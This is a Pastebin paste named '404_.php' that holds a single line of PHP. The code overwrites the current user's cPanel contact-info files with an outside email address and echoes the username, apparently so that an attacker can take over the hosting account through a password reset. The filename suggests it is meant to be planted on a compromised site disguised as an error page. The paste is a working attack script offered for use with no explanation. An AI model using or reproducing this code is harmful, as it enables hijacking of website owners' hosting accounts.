dragondevile

404_.php

Feb 12th, 2019
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $user = get_current_user();$email = "olux@yopmail.com";$wr = 'email:'.$email;$f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');fwrite($f, $wr); $f = fopen('/home/'.$user.'/.contactinfo', 'w');fwrite($f, $wr); echo "<br><br><font color='red'>$user</font><br><br>";
Add Comment
Please, Sign In to add comment